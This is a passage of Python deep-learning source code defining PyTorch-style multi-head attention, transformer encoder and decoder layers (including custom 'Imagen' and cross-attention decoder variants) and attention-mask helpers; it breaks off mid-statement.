Default: ``False`` (seq, batch, feature).\n\n Examples::\n\n >>> multihead_attn = nn.MultiheadAttention(embed_dim, num_heads)\n >>> attn_output, attn_output_weights = multihead_attn(query, key, value)\n \"\"\"\n __constants__ = ['batch_first']\n bias_k: Optional[torch.Tensor]\n bias_v: Optional[torch.Tensor]\n\n def __init__(self, embed_dim, num_heads, dropout=0., bias=True, add_bias_kv=False, add_zero_attn=False,\n kdim=None, vdim=None, batch_first=False, device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(MultiheadAttention, self).__init__()\n self.embed_dim = embed_dim\n self.kdim = kdim if kdim is not None else embed_dim\n self.vdim = vdim if vdim is not None else embed_dim\n self._qkv_same_embed_dim = self.kdim == embed_dim and self.vdim == embed_dim\n\n self.num_heads = num_heads\n self.dropout = dropout\n self.batch_first = batch_first\n self.head_dim = embed_dim // num_heads\n assert self.head_dim * num_heads == self.embed_dim, \"embed_dim must be divisible by num_heads\"\n\n if self._qkv_same_embed_dim is False:\n self.q_proj_weight = Parameter(torch.empty((embed_dim, embed_dim), **factory_kwargs))\n self.k_proj_weight = Parameter(torch.empty((embed_dim, self.kdim), **factory_kwargs))\n self.v_proj_weight = Parameter(torch.empty((embed_dim, self.vdim), **factory_kwargs))\n self.register_parameter('in_proj_weight', None)\n else:\n self.in_proj_weight = Parameter(torch.empty((3 * embed_dim, embed_dim), **factory_kwargs))\n self.register_parameter('q_proj_weight', None)\n self.register_parameter('k_proj_weight', None)\n self.register_parameter('v_proj_weight', None)\n\n if bias:\n self.in_proj_bias = Parameter(torch.empty(3 * embed_dim, **factory_kwargs))\n else:\n self.register_parameter('in_proj_bias', None)\n self.out_proj = NonDynamicallyQuantizableLinear(embed_dim, embed_dim, bias=bias)\n\n if add_bias_kv:\n self.bias_k = Parameter(torch.empty((1, 1, embed_dim), **factory_kwargs))\n self.bias_v = Parameter(torch.empty((1, 1, embed_dim), **factory_kwargs))\n else:\n self.bias_k = self.bias_v = None\n\n self.add_zero_attn = add_zero_attn\n\n self._reset_parameters()\n\n def _reset_parameters(self):\n if self._qkv_same_embed_dim:\n xavier_uniform_(self.in_proj_weight)\n else:\n xavier_uniform_(self.q_proj_weight)\n xavier_uniform_(self.k_proj_weight)\n xavier_uniform_(self.v_proj_weight)\n\n if self.in_proj_bias is not None:\n constant_(self.in_proj_bias, 0.)\n constant_(self.out_proj.bias, 0.)\n if self.bias_k is not None:\n xavier_normal_(self.bias_k)\n if self.bias_v is not None:\n xavier_normal_(self.bias_v)\n\n def __setstate__(self, state):\n # Support loading old MultiheadAttention checkpoints generated by v1.1.0\n if '_qkv_same_embed_dim' not in state:\n state['_qkv_same_embed_dim'] = True\n\n super(MultiheadAttention, self).__setstate__(state)\n\n def forward(self, query: Tensor, key: Tensor, value: Tensor, key_padding_mask: Optional[Tensor] = None,\n need_weights: bool = True, attn_mask: Optional[Tensor] = None) -> Tuple[Tensor, Optional[Tensor]]:\n r\"\"\"\n Args:\n query: Query embeddings of shape :math:`(L, N, E_q)` when ``batch_first=False`` or :math:`(N, L, E_q)`\n when ``batch_first=True``, where :math:`L` is the target sequence length, :math:`N` is the batch size,\n and :math:`E_q` is the query embedding dimension ``embed_dim``. Queries are compared against\n key-value pairs to produce the output. 
See \"Attention Is All You Need\" for more details.\n key: Key embeddings of shape :math:`(S, N, E_k)` when ``batch_first=False`` or :math:`(N, S, E_k)` when\n ``batch_first=True``, where :math:`S` is the source sequence length, :math:`N` is the batch size, and\n :math:`E_k` is the key embedding dimension ``kdim``. See \"Attention Is All You Need\" for more details.\n value: Value embeddings of shape :math:`(S, N, E_v)` when ``batch_first=False`` or :math:`(N, S, E_v)` when\n ``batch_first=True``, where :math:`S` is the source sequence length, :math:`N` is the batch size, and\n :math:`E_v` is the value embedding dimension ``vdim``. See \"Attention Is All You Need\" for more details.\n key_padding_mask: If specified, a mask of shape :math:`(N, S)` indicating which elements within ``key``\n to ignore for the purpose of attention (i.e. treat as \"padding\"). Binary and byte masks are supported.\n For a binary mask, a ``True`` value indicates that the corresponding ``key`` value will be ignored for\n the purpose of attention. For a byte mask, a non-zero value indicates that the corresponding ``key``\n value will be ignored.\n need_weights: If specified, returns ``attn_output_weights`` in addition to ``attn_outputs``.\n Default: ``True``.\n attn_mask: If specified, a 2D or 3D mask preventing attention to certain positions. Must be of shape\n :math:`(L, S)` or :math:`(N\\cdot\\text{num\\_heads}, L, S)`, where :math:`N` is the batch size,\n :math:`L` is the target sequence length, and :math:`S` is the source sequence length. A 2D mask will be\n broadcasted across the batch while a 3D mask allows for a different mask for each entry in the batch.\n Binary, byte, and float masks are supported. For a binary mask, a ``True`` value indicates that the\n corresponding position is not allowed to attend. For a byte mask, a non-zero value indicates that the\n corresponding position is not allowed to attend. For a float mask, the mask values will be added to\n the attention weight.\n\n Outputs:\n - **attn_output** - Attention outputs of shape :math:`(L, N, E)` when ``batch_first=False`` or\n :math:`(N, L, E)` when ``batch_first=True``, where :math:`L` is the target sequence length, :math:`N` is\n the batch size, and :math:`E` is the embedding dimension ``embed_dim``.\n - **attn_output_weights** - Attention output weights of shape :math:`(N, L, S)`, where :math:`N` is the batch\n size, :math:`L` is the target sequence length, and :math:`S` is the source sequence length. 
Only returned\n            when ``need_weights=True``.\n        \"\"\"\n        if self.batch_first:\n            query, key, value = [x.transpose(1, 0) for x in (query, key, value)]\n\n        if not self._qkv_same_embed_dim:\n            attn_output, attn_output_weights = F.multi_head_attention_forward(\n                query, key, value, self.embed_dim, self.num_heads,\n                self.in_proj_weight, self.in_proj_bias,\n                self.bias_k, self.bias_v, self.add_zero_attn,\n                self.dropout, self.out_proj.weight, self.out_proj.bias,\n                training=self.training,\n                key_padding_mask=key_padding_mask, need_weights=need_weights,\n                attn_mask=attn_mask, use_separate_proj_weight=True,\n                q_proj_weight=self.q_proj_weight, k_proj_weight=self.k_proj_weight,\n                v_proj_weight=self.v_proj_weight)\n        else:\n            attn_output, attn_output_weights = F.multi_head_attention_forward(\n                query, key, value, self.embed_dim, self.num_heads,\n                self.in_proj_weight, self.in_proj_bias,\n                self.bias_k, self.bias_v, self.add_zero_attn,\n                self.dropout, self.out_proj.weight, self.out_proj.bias,\n                training=self.training,\n                key_padding_mask=key_padding_mask, need_weights=need_weights,\n                attn_mask=attn_mask)\n\n        if self.batch_first:\n            return attn_output.transpose(1, 0), attn_output_weights\n        else:\n            return attn_output, attn_output_weights\n\nclass TransformerEncoderLayer(Module):\n    r\"\"\"TransformerEncoderLayer is made up of self-attn and feedforward network.\n    This standard encoder layer is based on the paper \"Attention Is All You Need\".\n    Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n    Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n    Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n    in a different way during application.\n\n    Args:\n        d_model: the number of expected features in the input (required).\n        nhead: the number of heads in the multiheadattention models (required).\n        dim_feedforward: the dimension of the feedforward network model (default=2048).\n        dropout: the dropout value (default=0.1).\n        activation: the activation function of the intermediate layer, can be a string\n            (\"relu\" or \"gelu\") or a unary callable. Default: relu\n        layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n        batch_first: If ``True``, then the input and output tensors are provided\n            as (batch, seq, feature). Default: ``False``.\n        norm_first: if ``True``, layer norm is done prior to attention and feedforward\n            operations, respectively. Otherwise it's done after. 
Default: ``False`` (after).\n\n Examples::\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n >>> src = torch.rand(10, 32, 512)\n >>> out = encoder_layer(src)\n\n Alternatively, when ``batch_first`` is ``True``:\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8, batch_first=True)\n >>> src = torch.rand(32, 10, 512)\n >>> out = encoder_layer(src)\n \"\"\"\n __constants__ = ['batch_first', 'norm_first']\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.relu,\n layer_norm_eps=1e-5, batch_first=False, norm_first=False,\n device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(TransformerEncoderLayer, self).__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm_first = norm_first\n self.norm1 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm2 = LayerNorm(d_model, eps=layer_norm_eps)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n\n # Legacy string support for activation function.\n if isinstance(activation, str):\n self.activation = _get_activation_fn(activation)\n else:\n self.activation = activation\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu\n super(TransformerEncoderLayer, self).__setstate__(state)\n\n def forward(self, src: Tensor, src_mask: Optional[Tensor] = None, src_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the input through the encoder layer.\n\n Args:\n src: the sequence to the encoder layer (required).\n src_mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n\n # see Fig. 1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n x = src\n if self.norm_first:\n x = x + self._sa_block(self.norm1(x), src_mask, src_key_padding_mask)\n x = x + self._ff_block(self.norm2(x))\n else:\n x = self.norm1(x + self._sa_block(x, src_mask, src_key_padding_mask))\n x = self.norm2(x + self._ff_block(x))\n\n return x\n\n # self-attention block\n def _sa_block(self, x: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x = self.self_attn(x, x, x,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=False)[0]\n return self.dropout1(x)\n\n # feed forward block\n def _ff_block(self, x: Tensor) -> Tensor:\n x = self.linear2(self.dropout(self.activation(self.linear1(x))))\n return self.dropout2(x)\n\n\nclass TransformerDecoderLayer(Module):\n r\"\"\"TransformerDecoderLayer is made up of self-attn, multi-head-attn and feedforward network.\n This standard decoder layer is based on the paper \"Attention Is All You Need\".\n Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n Neural Information Processing Systems, pages 6000-6010. 
Users may modify or implement\n    in a different way during application.\n\n    Args:\n        d_model: the number of expected features in the input (required).\n        nhead: the number of heads in the multiheadattention models (required).\n        dim_feedforward: the dimension of the feedforward network model (default=2048).\n        dropout: the dropout value (default=0.1).\n        activation: the activation function of the intermediate layer, can be a string\n            (\"relu\" or \"gelu\") or a unary callable. Default: relu\n        layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n        batch_first: If ``True``, then the input and output tensors are provided\n            as (batch, seq, feature). Default: ``False``.\n        norm_first: if ``True``, layer norm is done prior to self attention, multihead\n            attention and feedforward operations, respectively. Otherwise it's done after.\n            Default: ``False`` (after).\n\n    Examples::\n        >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)\n        >>> memory = torch.rand(10, 32, 512)\n        >>> tgt = torch.rand(20, 32, 512)\n        >>> out = decoder_layer(tgt, memory)\n\n    Alternatively, when ``batch_first`` is ``True``:\n        >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8, batch_first=True)\n        >>> memory = torch.rand(32, 10, 512)\n        >>> tgt = torch.rand(32, 20, 512)\n        >>> out = decoder_layer(tgt, memory)\n    \"\"\"\n    __constants__ = ['batch_first', 'norm_first']\n\n    def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.relu,\n                 layer_norm_eps=1e-5, batch_first=False, norm_first=False,\n                 device=None, dtype=None) -> None:\n        factory_kwargs = {'device': device, 'dtype': dtype}\n        super(TransformerDecoderLayer, self).__init__()\n        self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n                                            **factory_kwargs)\n        self.multihead_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n                                                 **factory_kwargs)\n        # Implementation of Feedforward model\n        self.linear1 = Linear(d_model, dim_feedforward)\n        self.dropout = Dropout(dropout)\n        self.linear2 = Linear(dim_feedforward, d_model)\n\n        self.norm_first = norm_first\n        self.norm1 = LayerNorm(d_model, eps=layer_norm_eps)\n        self.norm2 = LayerNorm(d_model, eps=layer_norm_eps)\n        self.norm3 = LayerNorm(d_model, eps=layer_norm_eps)\n        self.dropout1 = Dropout(dropout)\n        self.dropout2 = Dropout(dropout)\n        self.dropout3 = Dropout(dropout)\n\n        # Legacy string support for activation function.\n        if isinstance(activation, str):\n            self.activation = _get_activation_fn(activation)\n        else:\n            self.activation = activation\n\n    def __setstate__(self, state):\n        if 'activation' not in state:\n            state['activation'] = F.relu\n        super(TransformerDecoderLayer, self).__setstate__(state)\n\n    def forward(self, tgt: Tensor, memory: Tensor, tgt_mask: Optional[Tensor] = None, memory_mask: Optional[Tensor] = None,\n                tgt_key_padding_mask: Optional[Tensor] = None, memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n        r\"\"\"Pass the inputs (and mask) through the decoder layer.\n\n        Args:\n            tgt: the sequence to the decoder layer (required).\n            memory: the sequence from the last layer of the encoder (required).\n            tgt_mask: the mask for the tgt sequence (optional).\n            memory_mask: the mask for the memory sequence (optional).\n            tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n            memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n        Shape:\n            see the docs in Transformer class.\n        \"\"\"
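        # Data-flow sketch of the body below (shapes assume batch_first=False):
        #   tgt:    (tgt_len, batch, d_model),  memory: (src_len, batch, d_model)
        #   post-norm (norm_first=False):  x = norm1(x + self_attn(x))
        #                                  x = norm2(x + cross_attn(x, memory))
        #                                  x = norm3(x + ffn(x))
        #   pre-norm (norm_first=True) applies each norm before its sublayer instead.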
\n        # see Fig. 1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n        x = tgt\n        if self.norm_first:\n            x = x + self._sa_block(self.norm1(x), tgt_mask, tgt_key_padding_mask)\n            x = x + self._mha_block(self.norm2(x), memory, memory_mask, memory_key_padding_mask)\n            x = x + self._ff_block(self.norm3(x))\n        else:\n            x = self.norm1(x + self._sa_block(x, tgt_mask, tgt_key_padding_mask))\n            x = self.norm2(x + self._mha_block(x, memory, memory_mask, memory_key_padding_mask))\n            x = self.norm3(x + self._ff_block(x))\n\n        return x\n\n    # self-attention block\n    def _sa_block(self, x: Tensor,\n                  attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n        x = self.self_attn(x, x, x,\n                           attn_mask=attn_mask,\n                           key_padding_mask=key_padding_mask,\n                           need_weights=False)[0]\n        return self.dropout1(x)\n\n    # multihead attention block\n    def _mha_block(self, x: Tensor, mem: Tensor,\n                   attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n        x = self.multihead_attn(x, mem, mem,\n                                attn_mask=attn_mask,\n                                key_padding_mask=key_padding_mask,\n                                need_weights=False)[0]\n        return self.dropout2(x)\n\n    # feed forward block\n    def _ff_block(self, x: Tensor) -> Tensor:\n        x = self.linear2(self.dropout(self.activation(self.linear1(x))))\n        return self.dropout3(x)\n\n\n\nclass TransformerDecoderLayerImagen(Module):\n    r\"\"\"TransformerDecoderLayer is made up of self-attn, multi-head-attn and feedforward network.\n    This standard decoder layer is based on the paper \"Attention Is All You Need\".\n    Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n    Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n    Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n    in a different way during application.\n\n    Args:\n        d_model: the number of expected features in the input (required).\n        nhead: the number of heads in the multiheadattention models (required).\n        dim_feedforward: the dimension of the feedforward network model (default=2048).\n        dropout: the dropout value (default=0.1).\n        activation: the activation function of the intermediate layer, can be a string\n            (\"relu\" or \"gelu\") or a unary callable. Default: relu\n        layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n        batch_first: If ``True``, then the input and output tensors are provided\n            as (batch, seq, feature). Default: ``False``.\n        norm_first: if ``True``, layer norm is done prior to self attention, multihead\n            attention and feedforward operations, respectively. 
Otherwise it's done after.\n Default: ``False`` (after).\n\n Examples::\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)\n >>> memory = torch.rand(10, 32, 512)\n >>> tgt = torch.rand(20, 32, 512)\n >>> out = decoder_layer(tgt, memory)\n\n Alternatively, when ``batch_first`` is ``True``:\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8, batch_first=True)\n >>> memory = torch.rand(32, 10, 512)\n >>> tgt = torch.rand(32, 20, 512)\n >>> out = decoder_layer(tgt, memory)\n \"\"\"\n __constants__ = ['batch_first', 'norm_first']\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.relu,\n layer_norm_eps=1e-5, batch_first=False, norm_first=False,\n device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(TransformerDecoderLayerImagen, self).__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n self.multihead_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm_first = norm_first\n self.norm1 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm2 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm3 = LayerNorm(d_model, eps=layer_norm_eps)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n self.dropout3 = Dropout(dropout)\n\n # Legacy string support for activation function.\n if isinstance(activation, str):\n self.activation = _get_activation_fn(activation)\n else:\n self.activation = activation\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu\n super(TransformerDecoderLayerImagen, self).__setstate__(state)\n\n def forward(self, tgt: Tensor, memory: Tensor, tgt_mask: Optional[Tensor] = None, memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None, memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the inputs (and mask) through the decoder layer.\n\n Args:\n tgt: the sequence to the decoder layer (required).\n memory: the sequence from the last layer of the encoder (required).\n tgt_mask: the mask for the tgt sequence (optional).\n memory_mask: the mask for the memory sequence (optional).\n tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n # see Fig. 
1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n        x = tgt\n        x = self.norm1(x + self._sa_block(x, tgt_mask, tgt_key_padding_mask) + self._mha_block(x, memory, memory_mask, memory_key_padding_mask))\n        x = self.norm3(x + self._ff_block(x))\n\n        return x\n\n    # self-attention block\n    def _sa_block(self, x: Tensor,\n                  attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n        x = self.self_attn(x, x, x,\n                           attn_mask=attn_mask,\n                           key_padding_mask=key_padding_mask,\n                           need_weights=False)[0]\n        return self.dropout1(x)\n\n    # multihead attention block\n    def _mha_block(self, x: Tensor, mem: Tensor,\n                   attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n        x = self.multihead_attn(x, mem, mem,\n                                attn_mask=attn_mask,\n                                key_padding_mask=key_padding_mask,\n                                need_weights=False)[0]\n        return self.dropout2(x)\n\n    # feed forward block\n    def _ff_block(self, x: Tensor) -> Tensor:\n        x = self.linear2(self.dropout(self.activation(self.linear1(x))))\n        return self.dropout3(x)\n\n\nclass TransformerDecoderLayerCross(Module):\n    r\"\"\"TransformerDecoderLayer is made up of self-attn, multi-head-attn and feedforward network.\n    This standard decoder layer is based on the paper \"Attention Is All You Need\".\n    Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n    Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n    Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n    in a different way during application.\n\n    Args:\n        d_model: the number of expected features in the input (required).\n        nhead: the number of heads in the multiheadattention models (required).\n        dim_feedforward: the dimension of the feedforward network model (default=2048).\n        dropout: the dropout value (default=0.1).\n        activation: the activation function of the intermediate layer, can be a string\n            (\"relu\" or \"gelu\") or a unary callable. Default: relu\n        layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n        batch_first: If ``True``, then the input and output tensors are provided\n            as (batch, seq, feature). Default: ``False``.\n        norm_first: if ``True``, layer norm is done prior to self attention, multihead\n            attention and feedforward operations, respectively. 
Otherwise it's done after.\n Default: ``False`` (after).\n\n Examples::\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)\n >>> memory = torch.rand(10, 32, 512)\n >>> tgt = torch.rand(20, 32, 512)\n >>> out = decoder_layer(tgt, memory)\n\n Alternatively, when ``batch_first`` is ``True``:\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8, batch_first=True)\n >>> memory = torch.rand(32, 10, 512)\n >>> tgt = torch.rand(32, 20, 512)\n >>> out = decoder_layer(tgt, memory)\n \"\"\"\n __constants__ = ['batch_first', 'norm_first']\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.relu,\n layer_norm_eps=1e-5, batch_first=False, norm_first=False,\n device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(TransformerDecoderLayerCross, self).__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n self.multihead_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm_first = norm_first\n self.norm1 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm2 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm3 = LayerNorm(d_model, eps=layer_norm_eps)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n self.dropout3 = Dropout(dropout)\n\n # Legacy string support for activation function.\n if isinstance(activation, str):\n self.activation = _get_activation_fn(activation)\n else:\n self.activation = activation\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu\n super(TransformerDecoderLayerCross, self).__setstate__(state)\n\n def forward(self, tgt: Tensor, memory: Tensor, need_weights: bool = False, tgt_mask: Optional[Tensor] = None, memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None, memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the inputs (and mask) through the decoder layer.\n\n Args:\n tgt: the sequence to the decoder layer (required).\n memory: the sequence from the last layer of the encoder (required).\n tgt_mask: the mask for the tgt sequence (optional).\n memory_mask: the mask for the memory sequence (optional).\n tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n # see Fig. 
1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n x = tgt\n c_att,w = self._mha_block(x, memory, memory_mask, memory_key_padding_mask)\n x = self.norm2(x + c_att)\n x = self.norm1(x + self._sa_block(x, tgt_mask, tgt_key_padding_mask))\n x = self.norm3(x + self._ff_block(x))\n if need_weights:\n return x,w\n else:\n return x\n\n # self-attention block\n def _sa_block(self, x: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x = self.self_attn(x, x, x,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=False)[0]\n return self.dropout1(x)\n\n # multihead attention block\n def _mha_block(self, x: Tensor, mem: Tensor, attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x,w = self.multihead_attn(x, mem, mem,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=True)\n return self.dropout2(x),w\n\n # feed forward block\n def _ff_block(self, x: Tensor) -> Tensor:\n x = self.linear2(self.dropout(self.activation(self.linear1(x))))\n return self.dropout3(x)\n\n\nclass TransformerEncoder(Module):\n r\"\"\"TransformerEncoder is a stack of N encoder layers\n\n Args:\n encoder_layer: an instance of the TransformerEncoderLayer() class (required).\n num_layers: the number of sub-encoder-layers in the encoder (required).\n norm: the layer normalization component (optional).\n\n Examples::\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n >>> transformer_encoder = nn.TransformerEncoder(encoder_layer, num_layers=6)\n >>> src = torch.rand(10, 32, 512)\n >>> out = transformer_encoder(src)\n \"\"\"\n __constants__ = ['norm']\n\n def __init__(self, encoder_layer, num_layers, norm=None):\n super(TransformerEncoder, self).__init__()\n self.layers = _get_clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n\n def forward(self, src: Tensor, mask: Optional[Tensor] = None, src_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the input through the encoder layers in turn.\n\n Args:\n src: the sequence to the encoder (required).\n mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n output = src\n\n for mod in self.layers:\n output = mod(output, src_mask=mask, src_key_padding_mask=src_key_padding_mask)\n\n if self.norm is not None:\n output = self.norm(output)\n\n return output\n\n\nclass TransformerDecoder(Module):\n r\"\"\"TransformerDecoder is a stack of N decoder layers\n\n Args:\n decoder_layer: an instance of the TransformerDecoderLayer() class (required).\n num_layers: the number of sub-decoder-layers in the decoder (required).\n norm: the layer normalization component (optional).\n\n Examples::\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)\n >>> transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=6)\n >>> memory = torch.rand(10, 32, 512)\n >>> tgt = torch.rand(20, 32, 512)\n >>> out = transformer_decoder(tgt, memory)\n \"\"\"\n __constants__ = ['norm']\n\n def __init__(self, decoder_layer, num_layers, norm=None):\n super(TransformerDecoder, self).__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n\n def forward(self, tgt: Tensor, memory: Tensor, need_weights: bool = False, tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None, tgt_key_padding_mask: Optional[Tensor] = None,\n 
memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n        r\"\"\"Pass the inputs (and mask) through the decoder layer in turn.\n\n        Args:\n            tgt: the sequence to the decoder (required).\n            memory: the sequence from the last layer of the encoder (required).\n            tgt_mask: the mask for the tgt sequence (optional).\n            memory_mask: the mask for the memory sequence (optional).\n            tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n            memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n        Shape:\n            see the docs in Transformer class.\n        \"\"\"\n        output = tgt\n        weights = []\n\n        for mod in self.layers:\n            if need_weights:\n                output,w = mod(output, memory, tgt_mask=tgt_mask,\n                             memory_mask=memory_mask,\n                             tgt_key_padding_mask=tgt_key_padding_mask,\n                             memory_key_padding_mask=memory_key_padding_mask,need_weights=True)\n                weights.append(w)\n\n            else:\n                output = mod(output, memory, tgt_mask=tgt_mask,\n                             memory_mask=memory_mask,\n                             tgt_key_padding_mask=tgt_key_padding_mask,\n                             memory_key_padding_mask=memory_key_padding_mask)\n\n        if self.norm is not None:\n            output = self.norm(output)\n\n        if need_weights:\n            return output, weights\n        else:\n            return output\n\n\ndef _get_activation_fn(activation):\n    if activation == \"relu\":\n        return F.relu\n    elif activation == \"gelu\":\n        return F.gelu\n\n    raise RuntimeError(\"activation should be relu/gelu, not {}\".format(activation))\n\n\n\nfrom typing import Optional, Tuple\nimport torch\nimport torch.nn.functional as F\nimport torch.utils.checkpoint\nfrom torch import nn\nimport numpy as np\n\n\ndef _make_causal_mask(input_ids_shape: torch.Size, dtype: torch.dtype, past_key_values_length: int = 0):\n    \"\"\"\n    Make causal mask used for uni-directional (causal) self-attention.\n    \"\"\"\n    bsz, tgt_len = input_ids_shape\n    mask = torch.full((tgt_len, tgt_len), float(\"-inf\"))\n    mask_cond = torch.arange(mask.size(-1))\n    mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0)\n    mask = mask.to(dtype)\n\n    if past_key_values_length > 0:\n        mask = torch.cat([torch.zeros(tgt_len, past_key_values_length, dtype=dtype), mask], dim=-1)\n    return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length)\n\n\n\ndef _expand_mask(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None):\n    \"\"\"\n    Expands attention_mask from `[bsz, seq_len]` to `[bsz, 1, tgt_seq_len, src_seq_len]`.\n    \"\"\"\n    bsz, src_len = mask.size()\n    tgt_len = tgt_len if tgt_len is not None else src_len\n    if mask.dim() == 2:\n        expanded_mask = mask[:, None, None, :].expand(bsz, 1, tgt_len, src_len).to(dtype)\n    elif mask.dim() == 3:\n        expanded_mask = mask[:, None, :, :].to(dtype)\n    else:\n        raise 